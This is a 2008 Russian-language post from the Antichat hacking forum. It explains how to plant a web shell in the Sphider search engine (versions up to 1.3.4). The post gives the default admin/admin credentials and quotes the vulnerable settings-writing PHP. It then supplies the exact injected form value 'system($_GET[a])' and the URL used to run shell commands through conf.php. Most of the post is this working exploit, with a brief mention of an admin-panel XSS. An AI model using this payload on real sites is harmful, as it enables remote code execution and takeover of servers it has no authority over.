HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

[sphider] Заливка шелла
  #1  
Старый 13.12.2008, 23:47
Dimi4
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
С нами: 10077446

Репутация: 3965


По умолчанию [sphider] Заливка шелла

Powered by <=1.3.4

В Задании 003, где требовалось залить шелл был обнаружен этот движок. роспознал я его сразу, так как у самого когда то стоял такой. Сразу же полез на локалхост посмотреть сорцы. Оказалось что довольно просто залить шелл из админки.

Логин и пасс хранять не в зашифрованом виде в
http://site.com/sphider/admin/auth.php
Дефолт:
PHP код:
    error_reporting(E_ERROR E_PARSE);    
    
$admin "admin";
    
$admin_pw "admin"
Собственно заливка шелла
Уязвимый код:
PHP код:
if ($_index_pdf=="") {
    
$_index_pdf=0;

...
        
fwrite($fhandle"\n\n// Index pdf files\n");
        
fwrite($fhandle,"$"."index_pdf    = ".$_index_pdf";"); 
Удобнее это делать в опере. Идем в сорс и меняем это:

Код HTML:
 <input name="_index_pdf" type="checkbox"  value="0" id="index_pdf" >
на это:
Код HTML:
<input name="_index_pdf" type="checkbox"  value="0; system($_GET[a])" id="index_pdf" >
Сохраняем настройки.
В итоге имеем:

PHP код:
// Index pdf files
$index_pdf    0; echo($_GET[a]); 
http://site.com/sphider/settings/conf.php?a=ls -la

По иронии судьбы на том сайте что в задании прав на запись не хватало.

Также в админке есть xss. Но пользы мало, так как мы уже в админке).

Последний раз редактировалось jokester; 15.11.2009 в 14:04..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Заливка шелла через БД Tosic Уязвимости CMS / форумов 8 10.09.2014 01:20
Заливка шелла, взлом сайта. Sulf aka Joker Болталка 2 03.07.2006 23:55
Заливка шелла в punBB arts Уязвимости CMS / форумов 0 12.05.2006 16:37
Заливка шелла T-4 PHP 8 01.01.2006 19:05
Заливка шелла на PHP-Fusion. ilyha Уязвимости CMS / форумов 11 09.12.2005 20:52



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...